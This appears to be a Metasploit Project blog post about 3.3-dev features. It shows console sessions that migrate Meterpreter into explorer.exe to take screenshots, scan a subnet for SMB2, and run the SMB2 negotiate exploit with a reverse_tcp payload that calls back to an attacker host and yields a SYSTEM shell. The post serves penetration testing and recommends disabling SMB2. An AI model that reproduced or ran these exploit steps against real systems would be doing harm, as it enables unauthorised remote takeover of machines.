The last 48 hours has been a whirlwind of development at the Metasploit Project as we prepare for the 3.3 stable release. Efrain Torres completed the screenshot feature of the espia Metepreter module. This command only works when the process meterpreter is executing inside has access to the active desktop (like explorer.exe). You can see an example of this below:
meterpreter > ps Process list ============ PID Name Path --- ---- ---- 204 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe [ snipped ] 1736 Explorer.EXE C:\WINDOWS\Explorer.EXE 3348 sol.exe C:\WINDOWS\system32\sol.exe meterpreter > migrate 1736 [*] Migrating to 1736... [*] Migration completed successfully. meterpreter > screenshot /tmp/boom.bmp [*] Image saved to /tmp/boom.bmp Opening browser to image.
This morning Stephen Fewer released his long-awaited SMB2 code execution module for the Metasploit Framework. He plans to publish a whitepaper in the near future that discusses the exploit technique and the newly written Vista/2008 ring0 to ring3 stager code. This module is available in the 3.3-dev tree and supports Vista SP1/SP2 and 2008 SP1/SP2 (but not R2) with the same offsets and addresses. Keep in mind that the best workaround for this still-unpatched flaw is to disable the SMB2 protocol. The auxiliary module "auxiliary/scanner/smb/smb2" can be used to scan the network for systems that still have SMB2 enabled (shown below):
msf> use auxiliary/scanner/smb/smb2 msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24 msf (auxiliary/smb2) > set THREADS 100 msf (auxiliary/smb2) > run [*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours [*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours
When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.
Now that we have identified two systems with SMB2 enabled, its exploit time!
msf> use exploit/windows/smb/smb2_negotiate_func_index msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp msf (exploit/smb2) > set LHOST 192.168.0.136 msf (exploit/smb2) > set LPORT 5678 msf (exploit/smb2) > set RHOST 192.168.0.211 msf (exploit/smb2) > exploit [*] Started reverse handler [*] Connecting to the target (192.168.0.211:445)... [*] Sending the exploit packet (854 bytes)... [*] Waiting up to 180 seconds for exploit to trigger... [*] Sending stage (719360 bytes) [*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158) meterpreter > sysinfo Computer: WIN-UAKGQGDWLX2 OS : Windows 2008 (Build 6001, Service Pack 1). Arch : x86 Language: en_US meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Voila! A great way to justify disabling SMB2 across your network.
Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.
For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:
C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev
We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.